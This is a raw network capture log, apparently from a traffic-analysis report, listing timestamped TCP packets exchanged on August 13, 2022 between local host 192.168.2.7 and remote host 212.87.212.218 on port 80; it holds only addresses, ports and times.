                                                                                                          Aug 13, 2022 09:07:16.326323032 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.326329947 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.326348066 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.326384068 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.326411963 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.326416969 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.326421976 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.326428890 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.326451063 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.326484919 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.326505899 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.326514959 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.326518059 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.326551914 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.326570988 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.326581001 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.326585054 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.326620102 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.326637030 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.326647043 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.326654911 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.326689005 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.326704979 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.326713085 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.326721907 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.326756954 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.326776981 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.326786995 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.326791048 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.326826096 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.326843977 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.326853991 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.326858997 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.326879978 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.326894999 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.326930046 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.326946020 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.326955080 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.326963902 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.326997995 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327013969 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327022076 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327033043 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327065945 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327085972 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327095985 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327100039 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327122927 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327136040 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327150106 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327171087 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327208996 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327234030 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327240944 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327243090 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327269077 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327275991 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327311039 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327328920 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327337027 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327343941 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327402115 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327409983 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327457905 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327477932 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327510118 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327558041 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327563047 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327568054 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327574968 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327605009 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327642918 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327660084 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327671051 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327682972 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327708006 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327723026 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327760935 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327796936 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327799082 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327805996 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327811003 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327838898 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327857971 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327879906 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327955961 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.327982903 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327994108 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.327996016 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.328037977 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.328046083 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.328054905 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.328080893 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.328119040 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.328160048 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.328172922 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.328182936 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.328202009 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.328207016 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.328246117 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.328280926 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.328289986 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.328304052 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.328310966 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.328345060 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.328383923 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.328412056 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.328423023 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.328425884 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.328449011 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.328466892 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.328505993 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.328531981 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.328541040 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.328547955 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.328564882 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.328589916 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.328632116 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.328649998 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.328660965 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.328679085 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.328696012 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.328737020 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.328769922 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.328797102 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.328869104 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.328880072 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.328982115 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.329047918 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.329092026 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.329116106 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.329128027 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.329132080 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.329152107 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.329179049 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.329219103 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.329229116 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.329269886 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.329289913 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.329301119 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.329366922 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.329420090 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.329482079 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.346887112 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.346925974 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.346956968 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.346985102 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.346998930 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347012997 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347043991 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347073078 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347074986 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347083092 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347110987 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347145081 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347147942 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347173929 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347173929 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347194910 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347207069 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347235918 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347259045 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347266912 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347270966 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347276926 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347296953 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347311020 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347325087 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347390890 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347395897 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347409010 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347435951 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347466946 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347502947 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347573996 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347587109 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347595930 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347600937 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347635031 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347647905 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347681046 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347698927 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347722054 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347743988 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347759962 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347799063 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347817898 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347826958 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347839117 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347856045 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347878933 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347908974 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347920895 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.347943068 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.347990990 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348021030 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.348031998 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348057032 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.348071098 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348109007 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348114014 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.348140001 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348179102 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.348193884 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348232031 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.348236084 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348278046 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348315954 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348315954 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.348324060 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.348355055 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348390102 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.348395109 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348401070 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.348426104 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.348433018 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348473072 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348474026 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.348483086 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.348527908 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348584890 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348644018 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.348644972 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348705053 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348731041 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.348751068 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348766088 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.348794937 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348841906 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.348853111 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.348856926 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348897934 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348906994 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.348937035 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348948956 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.348975897 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.348980904 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349014997 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349037886 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349054098 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349065065 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349116087 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349123955 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349158049 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349168062 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349199057 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349222898 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349241018 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349275112 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349281073 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349282026 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349322081 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349360943 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349380970 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349391937 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349406958 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349416971 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349428892 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349462032 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349499941 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349538088 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349539042 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349546909 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349567890 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349577904 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349579096 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349617004 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349631071 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349658012 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349697113 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349714041 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349730968 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349750042 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349762917 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349790096 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349805117 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349827051 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349865913 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349883080 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349893093 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349909067 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349925041 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.349947929 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.349987984 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.350003004 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.350011110 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.350028992 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.350066900 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.350076914 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.350106955 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.350115061 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.350122929 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.350146055 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.350152969 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.350187063 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.350212097 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.350240946 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.350279093 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.350291967 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.350301981 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.350318909 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.350351095 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.350358963 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.350385904 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.350398064 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.350438118 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.350450039 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.350460052 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.350476980 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.350514889 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:16.350518942 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:16.350528955 CEST4977380192.168.2.7212.87.212.218
